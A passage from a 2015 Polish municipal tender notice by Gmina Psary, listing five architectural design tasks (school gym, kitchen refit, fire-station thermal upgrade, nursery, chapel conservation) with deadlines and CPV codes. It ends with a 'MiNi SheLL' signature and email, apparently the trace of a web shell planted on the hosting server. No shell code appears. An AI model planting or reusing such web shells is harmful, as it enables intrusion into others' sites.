nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne. 4. Zmiana projektanta wskazanego w ofercie na pisemny wniosek Wykonawcy lub Zamawiającego w przypadku: a) śmierci, choroby lub innych niezależnych zdarzeń losowych wskazanych osób b) nie wywiązywania się w/w osób z obowiązków wynikających z umowy c) jeżeli zmiana stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np.: rezygnacji) W przypadku zmiany nowa osoba musi spełniać wymagania określone w specyfikacji istotnych warunków zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.psary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Psarach ul. Malinowicka 4, 42-512 Psary, II piętro pokój 211.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2015 godzina 10:00, miejsce: Urząd Gminy w Psarach ul. Malinowicka 4, 42-512 Psary, kancelaria ogólna - parter budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający zamierza korzystać z dofinansowania z środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego w latach 2014-2020.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie kompletnych projektów budowlano - wykonawczych dla obiektów kubaturowych w Gminie Psary wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę i sprawowaniem nadzoru autorskiego, w podziale na; a) Zadanie Nr 1: Projekt budowlano-wykonawczy rozbudowy budynku Zespołu Szkolno - Przedszkolnego w Gródkowie przy ul. Leśnej 2, składające się z: I i II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I: Projekt budowlano - wykonawczy budowy sali gimnastycznej: Przedmiotem zamówienia jest opracowanie projektu budowlanego i wykonawczego wraz z pełną dokumentacją kosztorysową do celów przetargowych , specyfikacjami technicznymi wykonania i odbioru robót budowlanych i uzyskaniem pozwolenia na budowę dla budowy  sali gimnastycznej wraz z łącznikiem i zapleczem przy Zespole Szkolno - Przedszkolnym w Gródkowie. 2. Podstawowe założenia jakim winien odpowiadać projektowany obiekt: Zakłada się zaprojektowanie hali sportowej w technologii tradycyjnej. Obiekt powinien być dostosowany do korzystania przez osoby niepełnosprawne. Usytuowanie projektowanego obiektu przewiduje się w zbliżeniu do granicy z działką leśną , należy przewidzieć i zastosować rozwiązania techniczne, wynikające z przewidzianego usytuowania. Planowane wymiary samej sali gimnastycznej : - szerokość od 15 do 18 m, - długość od 26 - 30, - wysokość 7,2 m - 9,0 m Zastosowane rozwiązania projektowe powinny być wyważone ekonomicznie, gwarantujące tanią i bezawaryjną eksploatację obiektu. Propozycje opracowanych przez Wykonawcę rozwiązań projektowych będą wymagały akceptacji Zamawiającego. 2) II: Projekt budowlano - wykonawczy rozbudowy budynku o część przedszkolną wraz z adaptacją istniejącej sali gimnastycznej na salę szkolną. Przedmiotem zamówienia jest opracowanie pełnej dokumentacji budowlano - wykonawczej przetargowej rozbudowy zespołu szkolno - przedszkolnego o część przedszkolną z zapleczem wymaganym dla funkcji przedszkola oraz adaptacji istniejącej sali gimnastycznej na salę szkolną wraz z dostosowaniem istniejącego zagospodarowania terenu do nowej funkcji. Podstawowe założenia projektowe: Planowaną rozbudowę należy zaprojektować jako odrębny segment budynku, posiadający własne wejście od strony południowej , szatnię dla wszystkich dzieci, 2 lub 3 sale wraz z własnymi sanitariatami przeznaczonymi dla małych dzieci , pomieszczenia pomocnicze oraz zaplecze socjalne dla pracowników. Należy zaprojektować skomunikowanie części przedszkolnej ze szkołą poprzez przeprojektowanie sali lekcyjnej nr 1 (od strony północno - zachodniej) i wydzielenie korytarza komunikacyjnego , pomiędzy obiema częściami budynku. Projektowane rozwiązanie musi spełniać warunki użytkowania przez zespół szkolno - przedszkolny. Pozostałe szczegółowe założenia projektowe zawiera Załącznik Nr 8 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2: Projekt modernizacji kuchni i zaplecza oraz pomieszczeń dodatkowych w Zespole Szkolno - Przedszkolnym w Dąbiu przy ul. Pocztowej 39.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie pełnej dokumentacji budowlano - wykonawczej przetargowej przebudowy i dostosowania kuchni wraz z całym zapleczem sanitarnym , sanitariatami i przebudową sali Zespołu Szkolno -Przedszkolnego w Dąbiu do obowiązujących przepisów, ze szczególnym uwzględnieniem przepisów higieniczno - sanitarnych. Projektowane rozwiązanie musi spełniać warunki użytkowania przez zespół szkolno - przedszkolny. Dane wielkościowe i opis pomieszczeń przeznaczonych do modernizacji: Przedmiotowe pomieszczenia kuchni i zaplecza usytuowane są na kondygnacji budynku szkoły zagłębionej 1m poniżej poziomu terenu i są nie przystosowane do obecnie obowiązujących przepisów. Dojście z komunikacji ogólnej. Pomieszczenia przeznaczone do modernizacji to obecna kuchnia z zapleczem , pomieszczenie do gier i zabaw oraz część pomieszczeń szatni i komunikacji. Zadanie projektowe polega na przeprojektowaniu kuchni z zaprojektowaniem ciągu technologicznego , z wydzieleniem pomieszczeń przygotowalni i wydawalni potraw, zmywalni, przygotowalni warzyw oraz wydzieleniem magazynów ( z pomieszczeń szatni i komunikacji) i pomieszczeń uzupełniających, zgodnie z obowiązującymi przepisami i uzyskaniem wszelkich uzgodnień oraz wykonaniu szczegółowego projektu technologicznego wraz z dobraniem wyposażenia. Dodatkowo należy wykonać projekt przebudowy i powiększenia istniejącej sali na salę przedszkolną oraz projekt remontu sanitariatu z przedsionkiem. Powierzchnia całkowita części kuchennej ok. 150, 0 m2 Powierzchnia użytkowa części kuchennej ok. 135,0 m2 Wysokość pomieszczeń 2,72 m Kubatura ok.400 m3 Powierzchnia pom. przeznaczonych pod salę przedszkolną47,90 m2 (33 m2 + 14,90 m2) Powierzchnia sanitariatu do remontu 4,90 m2 Szczegółowe założenia projektowa zawiera Załącznik Nr 8a do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3: Projekt termomodernizacji i przebudowy budynku OSP w Górze Siewierskiej - I i II..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I: Termomodernizacja budynku Opis budynku i dane wielkościowe: Budynek OSP zlokalizowany jest na działce nr 137/1 , w centralnej części Góry Siewierskiej przy ul. Szopena i Ogrodowej. Budynek jest obiektem dwukondygnacyjnym o rozczłonkowanej, nieregularnej bryle. W kondygnacji parteru zlokalizowana jest sala wielofunkcyjna z antresolą oraz z zapleczem kuchennym, w kondygnacji przyziemia pomieszczenia techniczne, garaże straży oraz dodatkowe pomieszczenia . Długość 29,08 m Szerokość 24,59 m Wysokość do krawędzi ściany attykowej ok. 10 m Powierzchnia zabudowy 694,5 m2 Przedmiotem zamówienia jest opracowanie pełnej dokumentacji budowlano - wykonawczej przetargowej termomodernizacji budynku OSP w Górze Siewierskiej. 2) II: Przebudowa istniejących pomieszczeń w budynku Przedmiotem zamówienia części II jest opracowanie pełnej dokumentacji budowlano - wykonawczej przebudowy istniejących pomieszczeń budynku OSP w Górze Siewierskiej. Szczegółowe założenia projektowe zawiera Załącznik Nr 8b do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4: Projekt budowy żłobka w Psarach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia Przedmiotem zamówienia jest opracowanie kompletnych projektów budowlanych i wykonawczych dla budowy budynku żłobka w Psarach przy ul. Malinowickiej wraz z uzyskaniem ostatecznej decyzji o pozwoleniu na budowę i sprawowaniem nadzoru autorskiego. Przedmiotowy budynek żłobka usytuowany ma być w północno - zachodniej części działek inwestycyjnych, Przed budynkiem należy przewidzieć parking na min. 20 miejsc postojowych od strony drogi dojazdowej , z możliwością rozbudowy na większy. W ramach przedmiotu zamówienia przewiduje się : - usytuowanie projektowanego budynku i parkingu w północno - zachodniej części działki inwestycyjnej - wykonanie projektu budowlano - wykonawczego budynku wraz z pełnym wyposażeniem; - wykonanie projektu zagospodarowania terenu uwzględniającego nowe miejsca parkingowe, oświetlenie terenu, ciągi piesze, drogi, zieleń ( inwentaryzacja, wycinka , nasadzenia), przebudowy sieci zewnętrznych i przyłącza do budynku. Szczegółowe założenia projektowe zawiera Załącznik Nr 8c do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5: Projekt konserwatorski kapliczki na Poddzwonku w Brzękowicach Dolnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie projektu remontu konserwatorskiego przydrożnej kapliczki usytuowanej w Brzękowicach Dolnych przy ul.Poddzwonek na działce o nr ewidencyjnym 271 stanowiącej własność Gminy Psary. Obiekt jest wpisany do rejestru zabytków ruchomych pod nr B/524/79 z 25.07.1979r. Jest to obiekt murowany o wymiarach w rzucie poziomym 2,90x3,60m i wys. w kalenicy 5,0m z wieżyczką dzwonnicy pokryty dachówką i blachą cynkową. Szczegółowe załozenia projektowe zawiera Załacznik Nr 8d do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com